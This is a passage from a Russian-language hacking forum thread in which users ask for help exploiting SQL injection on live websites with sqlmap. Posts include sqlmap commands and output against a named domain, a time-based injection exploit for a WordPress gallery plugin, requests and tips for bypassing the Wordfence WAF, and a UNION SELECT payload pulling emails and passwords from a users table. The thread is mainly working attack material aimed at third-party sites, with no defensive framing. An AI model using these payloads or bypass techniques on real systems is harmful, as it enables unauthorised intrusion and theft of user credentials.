HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #991  
Старый 04.02.2020, 23:07
yuriy_ivanov
Guest
Сообщений: n/a
Провел на форуме:
734

Репутация: 0
По умолчанию

Цитата:
Сообщение от norther  
norther said:

Приветствую!
Ковыряю одну скулю:
SqlMap последней версии
web application technology: Apache, Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
ПРОБЛЕМА:
При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
"cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
" [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"
--no-cast и --hex пробовал - не помогает.
Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом
Что это может быть? Какие возможные решения данной проблемы?
на слепую скорее всего прога выдала ложный вывод , добавь в строку --banner --fresh-queries .

как вариант ,запустить через ТОР + верболзция=3 , смотреть на что ругается и символы корректировать
 
Ответить с цитированием

  #992  
Старый 06.02.2020, 11:28
hashfinderboss
Guest
Сообщений: n/a
Провел на форуме:
2992

Репутация: 0
По умолчанию

Люди добрые ,подскажите ввожу

sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs

получаю, имя бд

available databases [1]:
[*] bd_upgrade_live

далее ввожу

sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables

таблица не выводит,пишет

[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: key (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU

---

[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[08:12:55] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'

[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'

[08:13:01] [INFO] retrieved:

[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases

[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'

[08:13:03] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] n

No tables found

[08:14:27] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 3 times

[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/www.domen.mx'
[*] ending @ 08:14:27 /2020-02-06/

Обьясните пожалуйста почему так?
 
Ответить с цитированием

  #993  
Старый 06.02.2020, 16:14
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от hashfinderboss  
hashfinderboss said:

Люди добрые ,подскажите ввожу
sqlmap -u "
https://www.domen.mx/top/?key=xol
" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs
получаю, имя бд
available databases [1]:[*] bd_upgrade_live
далее ввожу
sqlmap -u "
https://www.domen.mx/top/?key=xol
" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables
таблица не выводит,пишет
[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU
---
[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:12:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'
[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'
[08:13:01] [INFO] retrieved:
[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases
[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'
[08:13:03] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[08:14:27] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3 times
[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/
www.domen.mx
'[*] ending @ 08:14:27 /2020-02-06/
Обьясните пожалуйста почему так?
Ну все логично, срабатывает какойто ваф, пробуйте крутить руками и смотреть на что срабатывает, и далее подбирайте/пишите нужный тампер
 
Ответить с цитированием

  #994  
Старый 06.02.2020, 16:23
Andrey979
Guest
Сообщений: n/a
Провел на форуме:
9189

Репутация: 0
По умолчанию

Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
 
Ответить с цитированием

  #995  
Старый 06.02.2020, 22:33
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Andrey979  
Andrey979 said:

Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт
не может быть. Попробуйте поставить *
 
Ответить с цитированием

  #996  
Старый 07.02.2020, 13:32
Andrey979
Guest
Сообщений: n/a
Провел на форуме:
9189

Репутация: 0
По умолчанию

Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)

Но в браузере пишет

403 Forbidden

A potentially unsafe operation has been detected in your request to this site

Как обойти этот WAF мапом?

Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
 
Ответить с цитированием

  #997  
Старый 07.02.2020, 21:40
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Andrey979  
Andrey979 said:

Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый
http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)
Но в браузере пишет
403 Forbidden
A potentially unsafe operation has been detected in your request to this site
Как обойти этот WAF мапом?
Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?
Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
 
Ответить с цитированием

  #998  
Старый 07.02.2020, 22:51
Andrey979
Guest
Сообщений: n/a
Провел на форуме:
9189

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.
У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
 
Ответить с цитированием

  #999  
Старый 07.02.2020, 22:58
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Andrey979  
Andrey979 said:

У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить
В хроме переводчик есть а ещё есть поиск по форуму
 
Ответить с цитированием

  #1000  
Старый 09.02.2020, 01:10
Xsite
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776

Репутация: 0
По умолчанию

может кто то помочь , привести в виду DIOSa ?

5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,

,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL

NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi

хотя тут юнион , но при этом выводит 1 запись оч долго
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ